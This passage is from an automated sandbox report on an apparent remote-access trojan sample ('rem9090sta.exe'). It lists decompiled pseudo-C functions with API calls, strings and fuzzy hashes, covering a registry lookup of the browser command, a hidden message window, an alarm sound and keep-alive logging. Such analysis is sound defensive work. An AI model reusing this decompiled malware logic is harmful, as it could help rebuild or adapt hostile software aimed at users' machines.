                                                                                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                • String ID: PF$`F$`F$hpg
                                                                                                • API String ID: 1634807452-2350595
                                                                                                • Opcode ID: 3bad36c2e35c944cfa3f639b08be45d2f68d2a4805d1172115b9c01d4fae8bcc
                                                                                                • Instruction ID: cf9aae1397a1510031da4f9d30786636f186c8b76d24d67c8d9f72cfcfab79f5
                                                                                                • Opcode Fuzzy Hash: 3bad36c2e35c944cfa3f639b08be45d2f68d2a4805d1172115b9c01d4fae8bcc
                                                                                                • Instruction Fuzzy Hash: 7A41A271A001194BC718F7B5D892EEDB3B9AF84308F10417FE506B71D2EE789E498A58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0043DF6A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 88%
                                                                                                			E0043DF6A(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E00448529(_t52);
					GetModuleFileNameA(0, 0x46d3c8, 0x104);
					_t49 =  *0x46da3c; // 0x653420
					 *0x46da44 = 0x46d3c8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x46d3c8;
					}
					_v8 = 0;
					_v16 = 0;
					E0043E08E(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E0043E203(_v8, _v16, 1);
					if(_t64 != 0) {
						E0043E08E(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E00448044(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x46da30 = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x46da34 = _t59;
									L16:
									E004414D5(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x46da30 = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x46da34 = _t43;
						goto L10;
					} else {
						_t44 = E00438932();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E004414D5(_t64);
						return _t50;
					}
				} else {
					_t45 = E00438932();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00437709();
					return _t65;
				}
			}





















                                                                                                0x0043df6a
                                                                                                0x0043df77
                                                                                                0x0043df97
                                                                                                0x0043dfaa
                                                                                                0x0043dfb0
                                                                                                0x0043dfb6
                                                                                                0x0043dfbe
                                                                                                0x0043dfc5
                                                                                                0x0043dfc5
                                                                                                0x0043dfca
                                                                                                0x0043dfd1
                                                                                                0x0043dfd8
                                                                                                0x0043dfea
                                                                                                0x0043dff1
                                                                                                0x0043e010
                                                                                                0x0043e01c
                                                                                                0x0043e037
                                                                                                0x0043e03a
                                                                                                0x0043e041
                                                                                                0x0043e047
                                                                                                0x0043e04e
                                                                                                0x0043e051
                                                                                                0x0043e053
                                                                                                0x0043e057
                                                                                                0x0043e061
                                                                                                0x0043e061
                                                                                                0x0043e063
                                                                                                0x0043e069
                                                                                                0x0043e06c
                                                                                                0x0043e06e
                                                                                                0x0043e074
                                                                                                0x0043e075
                                                                                                0x0043e07b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043e059
                                                                                                0x0043e059
                                                                                                0x0043e059
                                                                                                0x0043e05c
                                                                                                0x0043e05d
                                                                                                0x00000000
                                                                                                0x0043e059
                                                                                                0x0043e049
                                                                                                0x00000000
                                                                                                0x0043e049
                                                                                                0x0043e022
                                                                                                0x0043e027
                                                                                                0x0043e029
                                                                                                0x0043e02b
                                                                                                0x00000000
                                                                                                0x0043dff3
                                                                                                0x0043dff3
                                                                                                0x0043dff8
                                                                                                0x0043dffa
                                                                                                0x0043dffb
                                                                                                0x0043e030
                                                                                                0x0043e030
                                                                                                0x0043e07e
                                                                                                0x0043e07f
                                                                                                0x00000000
                                                                                                0x0043e088
                                                                                                0x0043df7f
                                                                                                0x0043df7f
                                                                                                0x0043df86
                                                                                                0x0043df87
                                                                                                0x0043df89
                                                                                                0x00000000
                                                                                                0x0043df8e

                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\rem9090sta.exe,00000104), ref: 0043DFAA
                                                                                                • _free.LIBCMT ref: 0043E075
                                                                                                • _free.LIBCMT ref: 0043E07F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$FileModuleName
                                                                                                • String ID: 4e$C:\Users\user\AppData\Local\Temp\rem9090sta.exe
                                                                                                • API String ID: 2506810119-3999612958
                                                                                                • Opcode ID: f7dad2b6f2b6daa974b10016e059f90a52307d051cb4cfa90bfd63d507b453ed
                                                                                                • Instruction ID: abc5074902d6b67550d0f801453305f63299cc00a6aadf52a9b33c5c6fba2338
                                                                                                • Opcode Fuzzy Hash: f7dad2b6f2b6daa974b10016e059f90a52307d051cb4cfa90bfd63d507b453ed
                                                                                                • Instruction Fuzzy Hash: 4631B371E05218AFDB25DF96DC819AEBBBCEB88314F10506BF40497351D6B84E41CB5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0043E5E7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 82%
                                                                                                			E0043E5E7(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				char** _t16;
				short* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x46d4d0; // 0x65eb40
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E00440628(_t13, _t11, 2);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E004414D5(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									E00448F9A(_t13);
									E004414D5(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}











                                                                                                0x0043e5e7
                                                                                                0x0043e5ea
                                                                                                0x0043e5f2
                                                                                                0x0043e5fb
                                                                                                0x0043e64a
                                                                                                0x0043e607
                                                                                                0x0043e60d
                                                                                                0x0043e611
                                                                                                0x0043e65b
                                                                                                0x0043e65b
                                                                                                0x0043e613
                                                                                                0x0043e61b
                                                                                                0x0043e61e
                                                                                                0x0043e621
                                                                                                0x0043e654
                                                                                                0x0043e655
                                                                                                0x00000000
                                                                                                0x0043e623
                                                                                                0x0043e629
                                                                                                0x0043e635
                                                                                                0x00000000
                                                                                                0x0043e637
                                                                                                0x0043e637
                                                                                                0x0043e638
                                                                                                0x0043e639
                                                                                                0x0043e63f
                                                                                                0x0043e644
                                                                                                0x0043e647
                                                                                                0x00000000
                                                                                                0x0043e647
                                                                                                0x0043e635
                                                                                                0x0043e621
                                                                                                0x0043e650
                                                                                                0x0043e653
                                                                                                0x00000000
                                                                                                0x0043e653
                                                                                                0x0043e64e
                                                                                                0x00000000
                                                                                                0x0043e5f4
                                                                                                0x0043e5f8
                                                                                                0x0043e5f8
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @e
                                                                                                • API String ID: 0-2994471477
                                                                                                • Opcode ID: 868d5aa3cf432876334364c8bf92592425eef820ed89f14e4eb5fdafdb720356
                                                                                                • Instruction ID: 43fc843c30d0de515c4782dec2aed7728dca3c5142c55f4bca766f8d14b1af4f
                                                                                                • Opcode Fuzzy Hash: 868d5aa3cf432876334364c8bf92592425eef820ed89f14e4eb5fdafdb720356
                                                                                                • Instruction Fuzzy Hash: 060126B260B2227EB6101ABB2CC1D27631CDFA53BDB30132BF522512D1EE38CC41452C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00417043, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 57COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 68%
                                                                                                			E00417043(void* __ebx) {
				char _v28;
				void* _t12;
				void* _t29;
				void* _t30;
				signed int _t38;
				void* _t40;

				_t18 = __ebx;
				_t40 = (_t38 & 0xfffffff8) - 0x18;
				_t31 = 0x30;
				E004189FF(_t40, 0x30, "alarm.wav");
				if(PathFileExistsW(E00401EDD( &_v28)) != 0) {
					L7:
					E004170FB(E00401EDD( &_v28), _t31);
				} else {
					_t31 = 0x460734;
					if(E00405C1B(0x460734) == 0) {
						_t12 = E00401EDD( &_v28);
						E004020DE(__ebx, _t40 - 0x18, 0x460734, __eflags, 0x46eb48);
						E0041843E(_t12);
						goto L7;
					} else {
						_t46 =  *0x46de9b;
						_t29 = _t40 - 0x18;
						_push(0x466b0c);
						if( *0x46de9b == 0) {
							E00402076(__ebx, _t29);
							_t30 = 0x46e848;
						} else {
							E00402076(__ebx, _t29);
							_t30 = 0x46eb60;
						}
						_push(0xa1);
						E00404BB7(_t18, _t30, _t31, _t46);
					}
				}
				return E00401EE2();
			}









                                                                                                0x00417043
                                                                                                0x00417049
                                                                                                0x0041704f
                                                                                                0x00417058
                                                                                                0x00417070
                                                                                                0x004170dc
                                                                                                0x004170e7
                                                                                                0x00417072
                                                                                                0x00417077
                                                                                                0x00417085
                                                                                                0x004170c0
                                                                                                0x004170cd
                                                                                                0x004170d4
                                                                                                0x00000000
                                                                                                0x00417087
                                                                                                0x0041708a
                                                                                                0x00417091
                                                                                                0x00417093
                                                                                                0x00417098
                                                                                                0x004170a6
                                                                                                0x004170ab
                                                                                                0x0041709a
                                                                                                0x0041709a
                                                                                                0x0041709f
                                                                                                0x0041709f
                                                                                                0x004170b0
                                                                                                0x004170b5
                                                                                                0x004170b5
                                                                                                0x00417085
                                                                                                0x004170fa

                                                                                                APIs
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00413D7F,00000000), ref: 00417068
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: HF$HF$`F$alarm.wav
                                                                                                • API String ID: 1174141254-2317669264
                                                                                                • Opcode ID: 969b99c8bd232c2939a894e006649f1fccf3e95d63387108fdfbbccd4a6fd1e0
                                                                                                • Instruction ID: 318cd7f06b4001feef8c3989cee73f9fcff78faf96b638aa90fff5a75fbbca3a
                                                                                                • Opcode Fuzzy Hash: 969b99c8bd232c2939a894e006649f1fccf3e95d63387108fdfbbccd4a6fd1e0
                                                                                                • Instruction Fuzzy Hash: FE010E30B0830052C614B627CD16AAE3AA48B81318F40443FF906272E2FF6E598682DF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00419839, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 70%
                                                                                                			E00419839() {
				char _v20;
				struct _WNDCLASSEXA _v68;
				void* __edi;
				struct HWND__* _t20;
				void* _t23;

				E00432D80(_t23,  &(_v68.style), 0, 0x2c);
				_v68.cbSize = 0x30;
				_v68.style = 0;
				_v68.lpfnWndProc = E004198B9;
				_v68.cbClsExtra = 0;
				asm("movsd");
				_v68.lpszClassName =  &_v20;
				_v68.cbWndExtra = 0;
				asm("movsd");
				_v68.lpszMenuName = 0;
				asm("movsd");
				asm("movsw");
				asm("movsb");
				if(RegisterClassExA( &_v68) == 0) {
					L3:
					return 0;
				}
				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
				if(_t20 == 0) {
					GetLastError();
					goto L3;
				}
				return _t20;
			}








                                                                                                0x0041984b
                                                                                                0x00419855
                                                                                                0x0041985f
                                                                                                0x00419865
                                                                                                0x0041986f
                                                                                                0x00419872
                                                                                                0x00419873
                                                                                                0x0041987a
                                                                                                0x0041987d
                                                                                                0x0041987e
                                                                                                0x00419881
                                                                                                0x00419882
                                                                                                0x00419884
                                                                                                0x0041988e
                                                                                                0x004198b0
                                                                                                0x00000000
                                                                                                0x004198b0
                                                                                                0x004198a0
                                                                                                0x004198a8
                                                                                                0x004198aa
                                                                                                0x00000000
                                                                                                0x004198aa
                                                                                                0x004198b8

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                • String ID: 0$MsgWindowClass
                                                                                                • API String ID: 2877667751-2410386613
                                                                                                • Opcode ID: 1a8e903979631d1016a27cd57f41c413eef6e79a38151dd7bb97ac41c86a5bae
                                                                                                • Instruction ID: 6e4b2f2fbb25679647d0e3db583a7e9b96aacd343425255e56b188905a1025b1
                                                                                                • Opcode Fuzzy Hash: 1a8e903979631d1016a27cd57f41c413eef6e79a38151dd7bb97ac41c86a5bae
                                                                                                • Instruction Fuzzy Hash: B50129B1900219ABDB10EFD5AC849EFBBBCFB45359F40052AF801A6240E77499448BA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0041097D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40registryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 63%
                                                                                                			E0041097D(void* __ecx) {
				void* _v8;
				int _v12;
				char _v2060;
				void* _t17;
				void* _t21;

				_v12 = 0x400;
				_t21 = __ecx;
				if(RegOpenKeyExW(0x80000000, L"http\\shell\\open\\command", 0, 0x20019,  &_v8) != 0) {
					_push(0x46079c);
				} else {
					RegQueryValueExW(_v8, 0, 0, 0,  &_v2060,  &_v12);
					RegCloseKey(_v8);
					_push( &_v2060);
				}
				E00404260(_t17, _t21);
				return _t21;
			}








                                                                                                0x0041098b
                                                                                                0x0041099a
                                                                                                0x004109af
                                                                                                0x004109da
                                                                                                0x004109b1
                                                                                                0x004109c2
                                                                                                0x004109cb
                                                                                                0x004109d7
                                                                                                0x004109d7
                                                                                                0x004109e1
                                                                                                0x004109ed

                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,hpg,?), ref: 004109A7
                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 004109C2
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004109CB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID: hpg$http\shell\open\command
                                                                                                • API String ID: 3677997916-1602025989
                                                                                                • Opcode ID: 30060840d79008935352a66e13825c7d0c8c5640c038a8d5412f09944e178519
                                                                                                • Instruction ID: 6e3bcc991b989e323dd396b0908a6ddb8c3ffb1d982f8e1382222d74d1baac98
                                                                                                • Opcode Fuzzy Hash: 30060840d79008935352a66e13825c7d0c8c5640c038a8d5412f09944e178519
                                                                                                • Instruction Fuzzy Hash: 52F02871600108FBDB509695DC09EDFBBBCEBC0B05F1000ABB604F2151DA745E8487A8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040B84F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 93%
                                                                                                			E0040B84F(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v16;
				signed int _t34;
				signed int* _t49;
				signed int* _t57;
				void* _t65;
				signed int* _t66;

				_t65 = __ecx;
				E00430DB5(__ecx, 0);
				E0040D4EF(__ecx + 4);
				E0040D4EF(__ecx + 0xc);
				E0040D4D9(__ecx + 0x14);
				E0040D4D9(__ecx + 0x1c);
				E0040D4EF(__ecx + 0x24);
				E0040D4EF(__ecx + 0x2c);
				_t76 = _a4;
				if(_a4 == 0) {
					_t49 =  &_v16;
					E0040B7F4(_t49, "bad locale name");
					E00432EDA( &_v16, 0x469700);
					asm("int3");
					_push(_t65);
					_t66 = _t49;
					E00431148(_t66);
					E0040D4D4( &(_t66[0xb]));
					E0040D4D4( &(_t66[9]));
					E0040D4D4( &(_t66[7]));
					E0040D4D4( &(_t66[5]));
					E0040D4D4( &(_t66[3]));
					E0040D4D4( &(_t66[1]));
					_t57 = _t66;
					_t34 =  *_t57;
					__eflags = _t34;
					if(_t34 == 0) {
						return E00440405(4);
					} else {
						__eflags = _t34 - 8;
						if(_t34 < 8) {
							_t37 = 0x46d050 + _t34 * 0x18;
							__eflags = 0x46d050 + _t34 * 0x18;
							return E0043165A(0x46d050 + _t34 * 0x18, _t37);
						}
						return _t34;
					}
				} else {
					E004310FD(__ebx, __edx, __edi, _t76, __ecx, _a4);
					return _t65;
				}
			}









                                                                                                0x0040b858
                                                                                                0x0040b85a
                                                                                                0x0040b862
                                                                                                0x0040b86a
                                                                                                0x0040b872
                                                                                                0x0040b87a
                                                                                                0x0040b882
                                                                                                0x0040b88a
                                                                                                0x0040b88f
                                                                                                0x0040b893
                                                                                                0x0040b8ae
                                                                                                0x0040b8b1
                                                                                                0x0040b8bf
                                                                                                0x0040b8c4
                                                                                                0x0040b8c5
                                                                                                0x0040b8c6
                                                                                                0x0040b8c9
                                                                                                0x0040b8d2
                                                                                                0x0040b8da
                                                                                                0x0040b8e2
                                                                                                0x0040b8ea
                                                                                                0x0040b8f2
                                                                                                0x0040b8fa
                                                                                                0x0040b8ff
                                                                                                0x00430e0d
                                                                                                0x00430e0f
                                                                                                0x00430e11
                                                                                                0x0044042d
                                                                                                0x00430e17
                                                                                                0x00430e17
                                                                                                0x00430e1a
                                                                                                0x00430e1f
                                                                                                0x00430e1f
                                                                                                0x00000000
                                                                                                0x00430e2a
                                                                                                0x00430e2b
                                                                                                0x00430e2b
                                                                                                0x0040b895
                                                                                                0x0040b899
                                                                                                0x0040b8a6
                                                                                                0x0040b8a6

                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040B85A
                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040B899
                                                                                                  • Part of subcall function 004310FD: _Yarn.LIBCPMT ref: 0043111C
                                                                                                  • Part of subcall function 004310FD: _Yarn.LIBCPMT ref: 00431140
                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 0040B8B1
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040B8BF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                                                                                                • String ID: bad locale name
                                                                                                • API String ID: 3706160523-1405518554
                                                                                                • Opcode ID: eb2eba8a977bc22fc332e77fda7d5bd42b1db41f8b508866d3809a01866c4b14
                                                                                                • Instruction ID: 69cd383198d7d2b34103a1576342d891162d40902a052bf2cad09b087f02cfff
                                                                                                • Opcode Fuzzy Hash: eb2eba8a977bc22fc332e77fda7d5bd42b1db41f8b508866d3809a01866c4b14
                                                                                                • Instruction Fuzzy Hash: 40F031318002046AC234FAA6D953EDA77A49F14718F50453FF516625D1AF7CBA4CC69D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004051C8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 86%
                                                                                                			E004051C8(void* __ecx, void* __edx, char _a4) {
				void* _t17;
				void* _t22;
				void* _t23;
				void* _t24;

				_t23 = __ecx;
				if( *((char*)(__ecx + 0x5c)) == 0) {
					return 0;
				}
				if(_a4 == 0) {
					_t25 = _t24 - 0x18;
					E00402076(_t17, _t24 - 0x18, "Connection KeepAlive | Disabled");
					E00402076(_t17, _t25 - 0x18, "!");
					E00417670(_t17, _t22);
				}
				 *(_t23 + 0x64) = CreateEventA(0, 0, 0, 0);
				SetEvent( *(_t23 + 0x60));
				WaitForSingleObject( *(_t23 + 0x64), 0xffffffff);
				CloseHandle( *(_t23 + 0x64));
				return 1;
			}







                                                                                                0x004051cc
                                                                                                0x004051d2
                                                                                                0x00000000
                                                                                                0x00405230
                                                                                                0x004051d8
                                                                                                0x004051da
                                                                                                0x004051e4
                                                                                                0x004051f3
                                                                                                0x004051f8
                                                                                                0x004051fd
                                                                                                0x0040520f
                                                                                                0x00405212
                                                                                                0x0040521d
                                                                                                0x00405226
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046E268), ref: 00405206
                                                                                                • SetEvent.KERNEL32(?), ref: 00405212
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040521D
                                                                                                • CloseHandle.KERNEL32(?), ref: 00405226
                                                                                                  • Part of subcall function 00417670: GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                Strings
                                                                                                • Connection KeepAlive | Disabled, xrefs: 004051DF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                • String ID: Connection KeepAlive | Disabled
                                                                                                • API String ID: 2993684571-3818284553
                                                                                                • Opcode ID: 2d9afaaf9e3e870e82b71fd5ca7069e492c1f110bd892313dd017f26f82a3c5b
                                                                                                • Instruction ID: 2bddbfc1ee49df3e12611f40a97416ebc0ed06e16b092b6b91d408743b26951f
                                                                                                • Opcode Fuzzy Hash: 2d9afaaf9e3e870e82b71fd5ca7069e492c1f110bd892313dd017f26f82a3c5b
                                                                                                • Instruction Fuzzy Hash: 7AF0C8718007107BDB103BB59C0EA6B7B98EB42355F40056FF842516E2D5758490CF5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0043DE6F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0043DE64,00000000,?,0043DE04,00000000,004692A8,0000000C,0043DF17,00000000,00000002), ref: 0043DE8F
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0043DEA2
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0043DE64,00000000,?,0043DE04,00000000,004692A8,0000000C,0043DF17,00000000,00000002), ref: 0043DEC5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 7af1b8489912adde396c70bbbcc49f345a6f339c82104cc0313c135778c6bdce
                                                                                                • Instruction ID: 3078402fde7eea089401c54d00f02f942a697a84336c48599992c4ccec9add49
                                                                                                • Opcode Fuzzy Hash: 7af1b8489912adde396c70bbbcc49f345a6f339c82104cc0313c135778c6bdce
                                                                                                • Instruction Fuzzy Hash: B5F0A431A00608FBCB119B90EC09B9EBFB4EF58B16F104069FC05A6291DF349D84CA98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004170FB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 86%
                                                                                                			E004170FB(WCHAR* __ecx, void* __edx) {
				void* __edi;
				void* _t7;
				void* _t12;
				WCHAR* _t14;
				void* _t16;

				_t17 = _t16 - 0x18;
				_t14 = __ecx;
				E00402076(_t7, _t16 - 0x18, "Alarm triggered");
				E00402076(_t7, _t17 - 0x18, "!");
				E00417670(_t7, _t12);
				PlaySoundW(_t14, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}








                                                                                                0x004170fd
                                                                                                0x00417100
                                                                                                0x00417109
                                                                                                0x00417118
                                                                                                0x0041711d
                                                                                                0x0041713b
                                                                                                0x00417142
                                                                                                0x0041714f

                                                                                                APIs
                                                                                                  • Part of subcall function 00417670: GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041712D
                                                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041713B
                                                                                                • Sleep.KERNEL32(00002710), ref: 00417142
